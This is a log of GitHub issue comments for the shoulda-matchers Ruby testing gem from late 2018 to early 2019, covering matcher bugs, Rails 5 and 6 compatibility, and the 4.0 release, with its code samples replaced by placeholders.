[2018-10-06 01:16] #1147 closed

[2018-10-07 04:40] indocomsoft commented on #1146
@matthewrudy I tried fixing this issue with this branch: https://github.com/indocomsoft/shoulda-matchers/tree/fix-1146

Can you check whether it works?

[2018-10-07 08:47] matthewrudy commented on #1146
@indocomsoft that looks perfect, thanks.

To confirm, running off current master

[code]

[code]

running off your branch

[code]

[code]

Seems to be the right fix,
thanks very much.

👍

[2018-10-07 18:06] jmadkins commented on #951
Can confirm I ran into this issue today.

[2018-10-12 14:31] nitishmadhukar opened #1149 "validates_inclusion_of on one attribute also checks validations on other attributes and throws an error"
I have 4 attributes on a model and two have `validates_presence_of` and two have `validates_inclusion_of`. When I am testing the inclusion attributes with `validate_inclusion_of` from shoulda-matchers, the tests fail because they are not able to provide valid values for the other fields. Is the testing strategy wrong here?

[2018-10-12 17:57] mcmire commented on #1149
Can you provide your tests? I may be able to help you better with an example.

[2018-10-12 18:18] nitishmadhukar commented on #1149
This is my model
[code]

and these are the tests

[code]

the error
[code]

[2018-10-12 21:53] mcmire commented on #1149
@nitishmadhukar It looks like you've flipped around your attributes. Try:

[code]

[2018-10-13 11:40] nitishmadhukar commented on #1149
oh my bad, thank you.

[2018-10-13 11:41] #1149 closed

[2018-10-17 03:30] namtx commented on #870
[code]

[2018-10-17 15:18] mcmire commented on #870
@namtx @Akhilesh05 @lucascaton We have a pre-release version out now! Try v4.0.0.rc1 to get `optional`.

[2018-10-26 06:22] kamille-321 opened #1152 "with_values method is not working??"
hi, I'm trying to using `with_values` method for testing enum keys, but got a error that indicate `with_values` is undefined for `Shoulda::Matchers::ActiveRecord::DefineEnumForMatcher`

Let me know if my code is wrong syntax or the method is already closed.
my code is below

[code]

[2018-10-30 23:50] mcmire commented on #1152
@kamille-321 You can! Try replacing this in your Gemfile:

[code]

with this:

[code]

[2018-10-31 05:30] kamille-321 commented on #1152
@mcmire Thanks!! Can I close this issue??

[2018-10-31 13:28] jasonperrone opened #1153 "Should belong_to with 'optional' not working"
4.0.0.rc1

Model Event has this:
  belongs_to :event_category, optional: true

Test has this:
  should belong_to(:event_category).optional

Get this:
Expected Event to have a belongs_to association called event_category (the association should have been defined with `optional: true`, but was not)

[2018-10-31 18:13] mcmire commented on #1152
@kamille-321 Yup, go ahead :)

[2018-10-31 23:35] #1152 closed

[2018-11-01 10:06] febeling commented on #953
I still have this same problem.

[2018-11-08 17:39] mccard opened #1154 "Check for belongs_to asks for explicit "required: true" when using before_validation"
### rails version

`5.1+`

### shoulda-matchers version

`  gem 'shoulda-matchers', '4.0.0.rc1'
`
### Error

[code]

### Steps to reproduce

[code]

[code]

[code]

## Note

It continues to happen if I set the `required: true`

[2018-11-10 01:37] drn opened #1155 "Support type-casted serialized attributes in validates_numericality_of"
Hi there,

We were trying to get shoulda-matchers work with type-casted virtual attributes (basically use the numeric column attribute behavior for virtual attributes). Our team uses [ActiveRecord::Store](https://api.rubyonrails.org/classes/ActiveRecord/Store.html) for a couple STI models. We type-cast these virtual attributes using the `ActiveModel::Type::*.cast(...)` helpers to match the behavio

[2018-11-12 16:10] mcmire commented on #1155
This is a known issue with the numericality matcher, and I thought perhaps I'd handled it already, but I haven't yet. There are numerous references to this in past issues, but all of them seem to have been closed, so I'll just leave this open. Unfortunately there's not a simple way to get around this right now; you may have to write some tests by hand.

[2018-11-13 00:10] drn commented on #1155
I see, thanks for the info @mcmire. I'm happy to help implement a solution if you point me to the right place. Cheers~

[2018-11-14 23:55] derekcannon commented on #1153
For reference, looks like this is the PR that added that: #1058

[2018-11-15 00:07] mcmire commented on #1153
@jasonperrone @derekcannon Do you have anything else in your Event model, such as a presence validation, that could be overriding the behavior of `belongs_to` in this case?

[2018-11-15 02:00] derekcannon commented on #1153
@mcmire I was just referencing the PR. I am not currently on 4.0.0 RC-1, and I haven't personally experienced this problem.

[2018-11-16 13:44] SzNagyMisu opened #1156 "validate_confirmation_of checks error message against the wrong attribute"
I work on a Rails 5.2 project. I test it with RSpec and use the shoulda-matchers for it. I am on the `rails-5` branch.

I wrote a test that the password should be confirmed,

[code]

and it just didn't work. And I got this error message

[code]

After a great deal of googling and trying I noticed something of an incoherence in the error message: it searched the error message of the attribute `:pas

[2018-11-16 16:34] mcmire commented on #1156
@SzNagyMisu, thanks for the report, we'll look into this. I'm a bit wary of changing those `values` as you suggest especially since we haven't changed this matcher in a long time. But I also notice that we don't really have tests around the error messages that this matcher produces, so there could be a hidden bug here.

@guialbuk I'm going to remove this from the 4.0 release since it seems like th

[2018-11-20 09:15] Russell108 opened #1157 "Re installation for Rails 5.2"
Hi I am on rails 5.2 & whatever I try I cannot seem to get these gems to work.

For example I added gems as follows
 gem 'shoulda', '~> 3.5'
   gem 'shoulda-matchers', '~> 2.0'

Then I get error
Error:
[code]
Is there an uptown date installation for the latest matchers ?
If not how can I use 'shoulda-matchers' the latest version

[2018-11-20 18:06] Russell108 commented on #1157
HI Elliot

I found another solution which I think seems to work

 gem "minitest-matchers_vaccine”

Thanks for the gems. Shoulda-matchers is saving me lots of time & effort & errors!!

Yes absolutely spend time on what’s essential

Kind regards Russell

[2018-11-20 18:09] mcmire commented on #1157
@Russell108 Ah, okay, glad you found a solution! I keep forgetting that Minitest::Spec is essentially doing what Shoulda did before. That's pretty rad!

[2018-12-02 20:06] Thor77 commented on #1067
This is still an issue.
Explicitly specifying an instance is even recommended in the [docs](http://matchers.shoulda.io/docs/v3.1.1/file.NonCaseSwappableValueError.html) but doesn't work as expected because as soon as another instance of the model was already persisted that one is used instead of the given one.

[2018-12-03 22:08] mcmire commented on #1067
Thanks for reminding me about this, @Thor77. (I can't believe it's already been a year since this was posted.) I thought about it again and I feel like we could probably bake this into a patch release after we release 4.0. Even thought it's technically backward-incompatible, as you say, the behavior documented doesn't even work anyway, so I don't feel like we would be surprising people (and if the

[2018-12-04 08:16] schadenfred commented on #1102
Without weighing in on whether or not adding this macro is a good idea, you can still use the has_many matcher to test ActiveStorage, given the following active record class in app/models/document.rb:

`
class Document < ApplicationRecord
    has_many_attached :documents_versions
end
`
Using Minitest::Spec in test/models/document_test.rb you should still be able to do:

`
describe Document do

  s

[2018-12-04 12:15] pareeohnos commented on #1153
I recently hit this exact same issue and have done some digging - we had a number of models that had optional associations and the tests were passing so the feature does appear to work just fine but it was just on a single model that it was failing.

I isolated the issue down to some additional validation rules which appear to be conflicting with the require checking so at a guess it is just check

[2018-12-04 16:52] mcmire commented on #1153
Hey @pareeohnos, thanks for the example. That makes perfect sense. I need to think about this further, but just as a quick sketch, I wonder if, for these kinds of scenarios, it would be better to have an additional qualifier to `belongs_to` which is something like:

[code]

This way, the matcher wouldn't even bother checking any kind of presence validation, and this would allow you to test presenc

[2018-12-05 09:14] pareeohnos commented on #1153
Ah that would work - I assume that the `optional` qualifier is just backwards compatible with older version of Rails so that it's just checking that the validation error doesn't exist? If so then yeah I think an additional qualifier would be needed to get around that

[2018-12-10 17:04] VSPPedro commented on #814
+1

[2018-12-12 11:28] sonalkr132 opened #1158 "NameError: uninitialized constant Routing"
I have following test:
[code]
in test_helper.rb
[code]
On running test I get following:
[code]

I am using should-matcher 3.2.1 and rails 5.2.1.1

[2018-12-12 15:34] mcmire commented on #1158
Try adding this to the top of your test class:

[code]

[2018-12-12 16:09] sonalkr132 commented on #1158
Doesn't help. I have tried all your suggestions on #953, including replacing [this](https://github.com/thoughtbot/shoulda-matchers/blob/master/lib/shoulda/matchers/integrations/libraries/routing.rb#L15) with `ActionDispatch::IntegrationTest`.

[2018-12-12 20:17] jeremywadsack commented on #913
For the record, it looks like 4.0.0.rc1 was released in Oct with Rails 5 support.

[2018-12-18 19:50] kleinjm commented on #1069
is there an estimated release date for 4.0.0?

[2018-12-18 21:46] #935 closed

[2018-12-19 00:48] guialbuk commented on #1069
Hi @kleinjm

We still have some open issues for `4.0.0`.

You can follow the progress and find issues to contribute for the next verion at:
https://github.com/thoughtbot/shoulda-matchers/milestone/13

[2018-12-20 12:36] Arthurjmoura opened #1160 "shoulda-matchers with rspec not running all tests"
Hi,

I'm using shoulda-matchers with rspec and I'm having a problem, my tests do not run completely, and every time I see a different quantity, someone can help me with this?

when I remove the configuration from the Shoulda-matchers it runs all tests

rails_helper.rb:

[code]

tests:
[code]

[2018-12-20 13:54] Cakirucho opened #1161 "validate_presence_of MongoID localize field false positive."
Hello, i'm building a new Rails App with **MongoID 7.0 and Rails 5**.

Right now i'm starting to use `localize` fields, that allow model to store localized String in that field, for example:

`field :name, type: String, localize: true`, if we save this field with a default language of `english`, this will save a Hash like --> `{en: "Orc"}`. But it will use it as an String.

So when i add `validate

[2018-12-20 18:00] guialbuk commented on #1161
Hi @Cakirucho

shoulda-matchers has no support for Mongoid.

But the good news is that there is a similar gem for Mongoid: https://github.com/mongoid/mongoid-rspec

Cheers!

[2018-12-20 18:00] #1161 closed

[2018-12-20 18:47] mcmire commented on #1160
It might be how you're starting SimpleCov. You might want to either put it as the very last thing in your file, or use this:

[code]

[2018-12-22 20:56] ericchapman commented on #953
Make sure you have the following somewhere in your Rails application

[code]

I have it in my "spec/rails_helper.rb" file so it only runs if I am running tests

[2018-12-27 15:01] Gmarn commented on #1066
Hi, I recently face to the same issue with polymorphic dependence:

Model classes
[code]

The test:
[code]

If I let the `required: true` uncomment I have the error:
[code]

If I comment/remove it, I do not have the error and the default behaviour is `required: true`

So I resolve this removing `required: true` from Price model.

The result is this is confusing and should be good we can let the `r

[2018-12-27 16:15] mcmire commented on #1066
Hi @Gmarn, sorry to hear you're seeing this. What is the value of `ActiveRecord::Base.belongs_to_required_by_default` in your app?

[2018-12-27 17:18] Gmarn commented on #1066
Hi @mcmire
I in `config/initializers/new_framework_defaults.rb` this configuration: `Rails.application.config.active_record.belongs_to_required_by_default = true`

[2018-12-27 22:17] mcmire commented on #1066
@Gmarn Okay. So just so I understand — if you leave off `required: true` from your association, you get the error, and adding it back makes the test pass? Or is the other way around?

[2018-12-27 22:33] Gmarn commented on #1066
@mcmire, If I have `required: true` in my association if have the error mentioned during the test only.
So I removed it from my `belongs_to` association.
The consequences are:

- test passed;
- behaviour is the one expected;
- but I can not mentioned `required: true` clearly in my code.

[2018-12-28 17:40] mcmire commented on #1154
Hey @mccard. Thanks for the detailed report and sorry it took so long for me to get back to you on this.

The reason why the matcher is failing is that your `manager` association is always being set. A presence validation is being added automatically by the matcher, but the matcher is confused because it expects a new instance of Employee to fail validation if `manager` is not set.

I think I ment

[2018-12-28 17:42] mcmire commented on #1158
@sonalkr132 Can you provide me with a backtrace so I can see where this error is occurring?

[2018-12-30 15:57] sonalkr132 commented on #1158
[code]

is all of it.

[2019-01-09 18:14] mcmire commented on #1066
@darrenterhune That is true, although it shouldn't make a difference whether you add `required: true` to your association or not in this case — the matcher should work either way. I'll take a closer look at this.

[2019-01-09 19:11] Gmarn commented on #1066
@darrenterhune I agree with you, at functionality layer this work. But here my issue is at reading of my code. Also @mcmire recently mentioned it well, even if I can work with this bug, it stay a bug that the gem find an error when there is no error.

[2019-01-10 08:46] keshavbiswa opened #1165 "Is there a way where I can tests validation with distinct associations ?"

[2019-01-10 08:48] keshavbiswa commented on #1165
I'm trying something like this

[code]

but I'm getting an error

[code]

Is there any way to do this?

[2019-01-10 08:54] sue445 opened #1166 "BigDecimal.new gives a warning in Ruby 2.6.0"
Now, Ruby 2.6.0 is released and `BigDecimal.new` is already deprecated.
https://github.com/ruby/ruby/blob/v2_6_0/NEWS

But latest `shoulda-matchers` (v3.1.2) uses `BigDecimal.new`.

Deprecation warning is displayed in `shoulda-matchers` :weary:

[code]

This is resolved at https://github.com/thoughtbot/shoulda-matchers/pull/1070 , but this change is included in only `v4.0.0.rc1`.

Do you have any

[2019-01-10 15:49] mcmire commented on #1166
Ugh. :) We'll have to see how much effort this is. My guess is that it is going to be a quick change, so I'll go ahead and tag this for 4.0.0.

[2019-01-10 16:33] keshavbiswa commented on #1165
How do I write a database constraints to my join table?

[2019-01-10 19:21] breisig commented on #1166
I am also getting the same message under Ruby 2.6.0

[2019-01-10 21:12] mcmire commented on #1165
Good question! You'll want to add a unique index that includes both of the columns in your join table. For instance:

[code]

[2019-01-11 14:53] andrey-skat commented on #1066
I have the same issue, but with `belongs_to_required_by_default` set to `false`. And with model
[code]
I get error `Expected Post to have a belongs_to association called user (the association should have been defined with `required: false`, but was not)`

shoulda-matcher 4.0.0.rc1
rails 5.2.2

PS: Actually I updated to rc version just to get rid from ::Fixnum deprecation warning. Could you make ve

[2019-01-11 16:20] mcmire commented on #1165
Cool! Glad I could help :)

[2019-01-11 16:20] #1165 closed

[2019-01-13 16:34] mcmire commented on #1154
@johnam Yup, that's what the matcher is doing already. The problem is that no matter how the matcher changes the association, the model is overwriting it before the presence validation gets run.

[2019-01-17 22:04] mcmire commented on #1166
Hey @mjankowski! Thanks for making that branch. I took a quick glance at Travis. That's very odd and I'm not certain what the solution there is. Perhaps it would make sense to upgrade some of the gems or maybe we need to pin some of the versions. I'm fine with releasing a 3.1.3 version given that I'm sure this is annoying. If you can figure this out, then great, otherwise I'll take a look when I g

[2019-01-18 19:49] mjankowski commented on #1166
Current status: https://github.com/thoughtbot/shoulda-matchers/compare/v3.1.2...v-3-1-stable (includes a changelog note, and the original commit).

I made a separate branch to try to suss out travis failure. This build - https://travis-ci.org/thoughtbot/shoulda-matchers/builds/481508216 - was attempting to use ruby 2.2 and rails 4.2.4, but does not include any gemfiles modifications from what was

[2019-01-20 07:05] SimplySerenity opened #1167 "validate_presence_of fails on Rails 6"
validate_presence_of relies on the constant ActiveModel::SecurePassword::InstanceMethodsOnActivation

which has been removed in Rails 6 https://github.com/rails/rails/commit/08dde0f355e0450bc2cb7e0b4b95a0ec18d1a870#diff-a6f9af64a6d420eb1103e16c0a0a8f04L66

[2019-01-20 08:48] sue445 commented on #1166
@mjankowski I fixed CI at #1168

[2019-01-20 16:01] mjankowski commented on #1166
Thanks, I merged that in, CI run looks good - https://travis-ci.org/thoughtbot/shoulda-matchers/builds/482054912

@mcmire you could probably tag v3.1.3 and release gem from that branch if it looks good to you.

[Diff](https://github.com/thoughtbot/shoulda-matchers/compare/v3.1.2...v-3-1-stable)

[2019-01-20 21:39] nicholasshirley commented on #1167
Found the same.

Looks like the third check could also return false when it should return true because the attribute can be assigned by the user now instead of always being `password`.

 https://github.com/thoughtbot/shoulda-matchers/blob/f951455f0f66ebc09a80bb20089b1b253c2ac0fb/lib/shoulda/matchers/active_model/validate_presence_of_matcher.rb#L149-L153

[2019-01-25 18:44] joshRpowell commented on #1167
related https://github.com/thoughtbot/shoulda-matchers/pull/1117

[2019-01-29 01:50] mcmire commented on #1160
I'm closing this to keep the issues list clean, but feel free to let me know if you're still seeing this.

[2019-01-29 01:50] #1160 closed

[2019-01-29 02:51] mcmire commented on #1166
@mjankowski and friends: I've released v3.1.3. Here is the tag: https://github.com/thoughtbot/shoulda-matchers/tree/v3.1.3.

[2019-01-29 10:56] Arthurjmoura commented on #1160
@mcmire Sorry, I tried to do what you said, but it's not working.

[2019-01-29 13:16] mjankowski commented on #1166
Awesome, thanks.

We should make sure the NEWS.md release notes get back into master. The bigdecimal changes are already there ... not sure on the CI stuff.

[2019-01-29 16:19] mcmire commented on #1160
@Arthurjmoura I'm noticing that you have the `Shoulda::Matchers.configure` block inside of the `RSpec.configure` block. Could that be causing any issues?

[2019-01-29 16:28] Arthurjmoura commented on #1160
@mcmire I edited the post, I actually left it in an external file.

support/shoulda_matchers_helper.rb
[code]

[2019-01-31 02:35] mcmire commented on #1146
@matthewrudy I'm revisiting this issue and there are a few things that stand out to me.

First, I think the previous version of the inclusion matcher had a hidden bug in it, where it didn't check to make sure that if the attribute was set to an invalid value it had an inclusion-related validation error message on it. The matcher didn't care which message was there, as long as the record was invali

[2019-02-02 13:03] askareija commented on #1113
i also have this error using shoulda-matchers 3.1.3, rspec-rails 3.8.2, rails 5.2.2, ruby 2.5.3

units_controller_spec.rb
[code]

output:
1) UnitsController GET #index without user token should respond with 401
     Failure/Error: it { should respond_with(403) }

     NoMethodError:
       `undefined method 'response_code' for nil:NilClass`
     `# ./spec/controllers/units_controller_spec.rb:6:in

[2019-02-04 16:21] mcmire commented on #1113
@askareija It doesn't look like you're making a request, so there's no `response` object. Try adding this at the top of your example group:

[code]

[2019-02-07 07:17] askareija commented on #1113
@mcmire oh yea how can i forgot that, thank you it's working now

[2019-02-09 06:12] sue445 commented on #1166
This issue (deprecation warning on Ruby 2.6) is resolved at v3.1.3. (but NEWS.md has not been updated)

Should I close this issue?

[2019-02-11 16:54] mjankowski commented on #1166
I updated NEWS in master, think this is all set now. Thanks for reminder.

[2019-02-11 16:54] #1166 closed

[2019-02-12 02:42] rafaeldev commented on #912
The method `backed_by_column_of_type` was refactored? I try use it but an error is raised:
`undefined method 'backed_by_column_of_type' for #<Shoulda::Matchers::ActiveRecord::DefineEnumForMatcher:xxx>`

[2019-02-12 15:45] mcmire commented on #912
@rafaeldev What version are you using?

[2019-02-12 17:55] grillermo opened #1173 "define_enum_for fails if the enum was defined in an included module"
In  shoulda-matchers/lib/shoulda/matchers/active_record/define_enum_for_matcher.rb the method

[code]
Uses singleton_methods without passing true which will return only methods defined in the class, with true will return also methods included by a module as described here
https://apidock.com/ruby/Object/singleton_methods

I had my enum defined in a module, to share it with multiple classes, so thi

[2019-02-12 18:15] #1173 closed

[2019-02-12 21:00] petergoldstein commented on #1001
@guialbuk We just ran into this issue, and were wondering if there's an update on either:

1. `4.0` will be released as a gem
2. This fix could be backported to  the `3.1.x` branch and published as a new gem version.

Your last update (~8 months ago) said that 4.0 will be released 'very soon'.  Anything I can do to help?

[2019-02-13 03:34] guialbuk commented on #1001
Hi @petergoldstein

1. 4.0 had significant code changes since the last year, and 4.0.0.rc1 is available: https://github.com/thoughtbot/shoulda-matchers/releases/tag/v4.0.0.rc1
2. Yes, and the 3.1.3 was released recently with this PR backported: https://github.com/thoughtbot/shoulda-matchers/releases/tag/v3.1.3

But my suggestion is to give a try to the `master` branch. That's the code with more fe

[2019-02-13 04:04] petergoldstein commented on #1001
Hi @guialbuk,

Thanks for the quick response.

So I'm using 3.1.3 and still seeing this error:

    .../gems/shoulda-matchers-3.1.3/lib/shoulda/matchers/active_model/validate_inclusion_of_matcher.rb:551: warning: constant ::Fixnum is deprecated

Checking the code confirms that this issue exists in 3.1.3 - https://github.com/thoughtbot/shoulda-matchers/blob/3fea7992fd78f9365794de927f9f3589830a6947/

[2019-02-15 05:56] mcmire commented on #1153
I just merged in a commit that adds a `without_presence_validation` qualifier to `belongs_to` and this will be going out in 4.0.

[2019-02-15 05:56] #1153 closed

[2019-02-15 05:58] mcmire commented on #1066
@andrey-skat Hey, can you make a new issue for removing the `Fixnum` deprecation warning? I can release a 3.1.4 to address that.

[2019-02-15 06:16] mcmire commented on #1066
@andrey-skat Also, do you have any other things in your model that around `:user`? We have an explicit test for your exact case to ensure that still works, so I'm a bit perplexed as to how you could be getting that error.

[2019-02-15 06:17] mcmire commented on #1154
I've added a new `without_validating_presence` qualifier to `belong_to` to address cases like these, and that will be available in 4.0. Docs here: https://github.com/thoughtbot/shoulda-matchers/blob/707d87dbd60d2b1781f4ea2e9dab73e207d65173/lib/shoulda/matchers/active_record/association_matcher.rb#L275

[2019-02-15 06:17] #1154 closed

[2019-02-16 08:33] mcmire commented on #1066
I just tried to reproduce the last few bugs mentioned here in a fresh Rails 5.2.2 app using 4.0.0.rc1 and I wasn't able to do that. With that in mind I'm going to close this issue as I feel like for most people this should be working (and it's getting hard to track all of the bugs here). If you are experiencing any more bugs then please file a new issue. Even better, if you can replicate your bug

[2019-02-16 08:33] #1066 closed

[2019-02-16 08:34] #1146 closed

[2019-02-17 21:55] mcmire commented on #999
This isn't applicable anymore. In fact the ActiveSupportTestCase class doesn't seem to be getting used at all. ActiveSupport::TestCase inherits from Minitest::Test which already works correctly. So I'm closing this.

[2019-02-17 21:55] #999 closed

[2019-02-18 14:44] PhilCoggins opened #1175 "validate_uniqueness_of matcher raises exception when scope_to attribute is string"
Version: `shoulda-matchers (4.0.0.rc1)`
Given an ActiveRecord model with a uniqueness validation where the scoped_to parameter is a string (which is otherwise appears to be perfectly valid):
[code]

And a spec:
[code]

I expect the validation to run, but it errors out:
[code]

This appears to stem from the fact that arguments are [expected to be symbols](https://github.com/thoughtbot/shoulda-match

[2019-02-18 16:52] mcmire commented on #735
Fixed in [670f154](https://github.com/thoughtbot/shoulda-matchers/commit/670f154afcc6363ebcb415d15f589140ebb438ea).

[2019-02-18 16:52] #735 closed

[2019-02-18 16:54] mcmire commented on #759
I think we can close this now. We have this section in the README which should cover this: https://github.com/thoughtbot/shoulda-matchers#availability-of-matchers-in-various-example-groups

[2019-02-18 16:54] #759 closed

[2019-02-18 16:56] mcmire commented on #795
I'm closing this since there hasn't been a response in a long while. Feel free to respond if you are still having this issue.

[2019-02-18 16:56] #795 closed

[2019-02-18 16:58] mcmire commented on #807
I forgot what my plans were for this, but I think this is now covered in this section, so I'm closing this: https://github.com/thoughtbot/shoulda-matchers#availability-of-matchers-in-various-example-groups

[2019-02-18 16:58] #807 closed

[2019-02-18 17:07] mcmire commented on #905
Closing this since it doesn't seem like there is a bug here, only a misunderstanding.

[2019-02-18 17:07] #905 closed

[2019-02-18 17:08] mcmire commented on #916
Hey @mutant-city, I know it's been a long time since you made this issue, but I wanted to check in and see if you possibly are still getting this?

[2019-02-18 17:20] mcmire commented on #998
I just came across this issue and did not realize that RSpec automatically adds this gem. Once we get Shoulda upgraded to shoulda-matchers 4, we should move the `gem 'rails-controller-testing'` line to the Minitest section.

[2019-02-18 17:32] mcmire commented on #1175
Thanks for the report! We'll see if we can fix this in the next version.

[2019-02-19 07:18] kbleabres commented on #814
+1

[2019-02-21 09:40] Drenmi opened #1178 "Asserting enum values from a hash fails in 4.0.0"
Just encountered this after upgrading today. Not sure if I'm missing something obvious, but the error message isn't very helpful ... 😅

### Steps to Reproduce

#### Model

[code]

#### Test

[code]

*(Note that an array of symbols also results in a failing test, but with a slightly different message.)*

### Expected Behaviour

Tests pass.

### Actual Behaviour

### Things I've Tried

All possible

[2019-02-22 02:14] Drenmi commented on #1178
I was able to make this test pass by changing the matcher to use a hash:

[code]

So perhaps this is intended behaviour? Although the new method name `#with_values` and the error output are probably a bit misleading.

[2019-02-22 04:33] rafaeldev commented on #912
Hi! Sorry for late... The versions:
- `shoulda-matchers (3.1.3)`
- `rails (5.2.2)`

The spec example:
`should define_enum_for(:kind).with(a: 0, b: 1, c: 2).backed_by_column_of_type(:string)`

[2019-02-22 06:14] mcmire commented on #912
@rafaeldev The `backed_by_column_of_type` qualifier is available in 4.0.0! Upgrade to get it.

[2019-02-22 06:21] mcmire commented on #1178
@Drenmi I glanced at your issue today and couldn't quite figure out why you were getting that issue, but your update makes more sense now — what you pass to `with_values` has to match how you defined the `enum`. I agree that the error is misleading. What do you think about this message instead?

[2019-02-22 06:28] Drenmi commented on #1178
‹"done"›. However, :status actually maps 0 to ‹"pending"›, 1 to ‹"running"›, and 6 to ‹"done"›.

With this message, I would have been able to figure it out pretty much right away. 🙂

[2019-02-22 17:03] mcmire commented on #1178
@Drenmi Haha, perfect. I will fix this shortly. I'll leave this issue open in the meantime.

[2019-02-25 00:07] MadBomber opened #1179 "gemspec problem makes boilerplate files globally executable"
The bin directory only contains common boilerplate files.  The gemspec file those common boilerplate files in the bin directory globally executable.  Delete the line in the gemspec that makes everything in the bin directory globally executable.

Delete this line:
 s.executables = `git ls-files -- bin/*`.split("\n").map{ |f| File.basename(f) }

[2019-02-25 06:57] mcmire commented on #1179
Hey! Thanks for bringing this to our attention. You are 100% right and I am super embarrassed by this. I just opened #1180 to fix this. As soon as the tests pass I'll merge it and issue another release.

[2019-02-26 05:14] mcmire commented on #1179
I've released 4.0.1 with a correct gemspec. I've also yanked 4.0.0 so that hopefully this doesn't happen for anyone else.

[2019-02-26 05:14] #1179 closed

[2019-02-26 06:20] n-rodriguez opened #1181 "Review of PR 1180"
Hi there!

I review the https://github.com/thoughtbot/shoulda-matchers/pull/1180 : I don't know if doing a `chdir` is a good thing here. If you wanted to remove `setup` you could have removed the `executables` method call.
See Sidekiq for example : https://github.com/mperham/sidekiq/pull/4023

[2019-02-26 17:41] mcmire commented on #1181
Hey, in making those changes I took a look at what Bundler is now doing whenever it generates gems and decided to borrow from that: https://github.com/bundler/bundler/blob/master/lib/bundler/templates/newgem/newgem.gemspec.tt. Are you having issues with this now?

[2019-02-26 17:42] mcmire commented on #1181
Left a comment on your PR :)

[2019-02-26 22:29] abhchand commented on #1102
Hey all -

I just opened a PR with activestorage to formally add validations to the library. See https://github.com/rails/rails/pull/35390

The validations cover `content_type` and `size`. Validating `presence` is a bit difficult (explained in the PR) but I hope to add it at some point.

I love the shoulda-matchers library (huge thanks to everyone who has helped build it). I think it would be grea

[2019-02-26 22:35] #1181 closed

[2019-02-28 14:43] salimane opened #1184 "Could not find shoulda-matchers-4.0.0 in any of the sources"
I am getting the above
Gemfile
[code]
[code]

any idea why is this happening ?

[2019-02-28 16:23] mcmire commented on #1184
@salimane I'm not sure why that's happening. If you request 3.1.3, you should be getting 3.1.3 (I just installed it locally to make sure). I did end up yanking 4.0.0, so it's not available anymore, but that doesn't explain why you're getting this error. What happens if you say `gem install shoulda-matchers -v 3.1.3` manually?

[2019-03-01 15:38] salimane commented on #1184
@mcmire for some reasons, it started working again. I will close this. Thanks again

[2019-03-01 15:38] #1184 closed

[2019-03-01 15:41] mcmire commented on #1184
Weird, okay!

[2019-03-05 17:25] ArcDlrt opened #1185 "Issue with belongs_to having a delegate called in validations 4.0.1"
After upgrading the gem from 3.1.2 to 4.0.1 the following spec failded

[code]

The result of running this spec is an `undefined method `criteria_type' for nil:NilClass`
[code]

This is the relevant code for the example given

[code]

[code]

This was run using RoR 5.2.0, Ruby 2.4.3 and shoulda-matchers 4.0.1

[2019-03-05 17:49] mcmire commented on #1185
You're getting this because the `belong_to` matcher now tests whether your association is allowed to be nil. If you have some sort of action that attempts to create a ProfileRiskVariable without `profile_risk_variable_id` being set, you will likely run into the same error — the matcher is just revealing a code path that you may have never executed before.

It looks like in your `range_criteria?` m

[2019-03-05 19:21] ArcDlrt commented on #1185
I see, it make sense since now the relationship is by default required.

Thank you very much

[2019-03-05 19:24] mcmire commented on #1185
No problem!

[2019-03-05 19:24] #1185 closed

[2019-03-09 00:31] contentfree commented on #1066
Just coming by to say that *my* `it { should belong_to(:my_association) }` is fails with Rails 5.1.6.1 and shoulda-matchers 4.0.1 *unless* I include `required: true` when defining the association. (`belongs_to_required_by_default = true` BTW). So basically the opposite of @Gmarn ?

[2019-03-09 04:26] yagudaev commented on #1167
It would be really nice to have this fixed with new version of rails around the corner

[2019-03-09 16:41] mcmire opened #1186 "Add Rails 6 to the list of Appraisals, fix any breaking tests"
This issue may include other issues in order to completely fix, but I'm just putting this here in order to document it.

[2019-03-09 16:43] mcmire commented on #1066
Sorry to hear this @contentfree. Again, if you can replicate this in a [test app](https://github.com/mcmire/shoulda-matchers-test-apps) then that would help me a lot!

[2019-03-09 21:12] dgilperez commented on #1066
I'm having a similar unexpected behaviour here, that may help nail down these issues. With `belongs_to_required_by_default` set to `true`, and the following code:

[code]

I'm seeing:

[code]

Ofc, I was expecting the `required` matcher to pass and the `optional` to fail.

In the meanwhile I'm setting the association to `optional`.

[2019-03-09 23:28] mcmire commented on #1167
@yagudaev We plan on including support for Rails 6 in the next immediate version, so this is included in the list of upcoming changes.

[2019-03-10 14:31] mcmire opened #1187 "have_secure_password cannot be used in the negative"
The `have_secure_password` is missing a `failure_message_when_negated` method, so it cannot be used like this:

[code]

[2019-03-10 14:34] nscmnto commented on #1167
@yagudaev thanks for the workaround!

[2019-03-14 07:10] Looooong commented on #1005
Also, it doesn't work with chained methods:

[code]

[2019-03-14 17:27] mcmire commented on #1005
Hi @Looooong, can you make a new issue for that so it's easier to keep track of individual bugs?

[2019-03-14 22:28] yagudaev commented on #1095
Thanks for the tip @mcmire works great.

However, I do still think the `validate_presence_of` matcher should also be able to look for the 'must exist' message and pass. It is rather confusing behaviour at the moment.

[2019-03-17 00:52] stadniklksndr opened #1189 "with_values method is not working for String in 4.0.1"
Hi @mcmire
### Steps to Reproduce
**Model**

[code]
**Test**
[code]

### Expected Behaviour
Test pass.

### Actual Behaviour
[code]

**Additional Information**

[code]

[2019-03-17 20:05] mcmire commented on #1189
Hey @stadniklksndr. I think it's all because of your `_prefix` option. What happens if you try something like this?

[code]

[2019-03-18 11:22] stadniklksndr commented on #1189
@mcmire
I did like you said and now i get this error:
[code]

**Test passed successfully when i added:**  ```with_prefix(:status)``` :tada:

[code]
It's very strange because i tried this variant before and it didn't work.
Anyway this is my mistake :smile:, thank you for a quick response.

[2019-03-18 11:22] #1189 closed

[2019-03-18 17:18] mcmire commented on #1189
@stadniklksndr Oh! I completely forgot we support that option now. Glad you figured it out, cheers! 🍻

[2019-03-19 06:13] mikeduynguyen commented on #1114
@mcmire I apologize for the looong the delay on this 😅. Finally got to open the PR to fix this bug here #1190 .

It's my first time contributing to an open source project so please let me know if you have any suggestions for the PR.

[2019-03-19 18:38] brunohkbx commented on #1005
@mcmire I've been working on this issue but I couldn't find any way to expose the instance variables defined in the class to the singleton_class.

I could make this matcher `subject_has_delegate_object_reader_method?` pass by adding this conditional:
`subject.instance_variable_defined?(delegate_object_reader_method)`

However, I think there's no way to make the singleton_class access the instance_

[2019-03-21 10:27] vrih commented on #1189
So it seems like `with_prefix` does not accept a boolean, differing from docs [here](https://github.com/thoughtbot/shoulda-matchers/blob/master/lib/shoulda/matchers/active_record/define_enum_for_matcher.rb#L86)

[2019-03-21 17:02] mcmire commented on #1189
@vrih Can you make a new issue for this so it can be properly tracked?

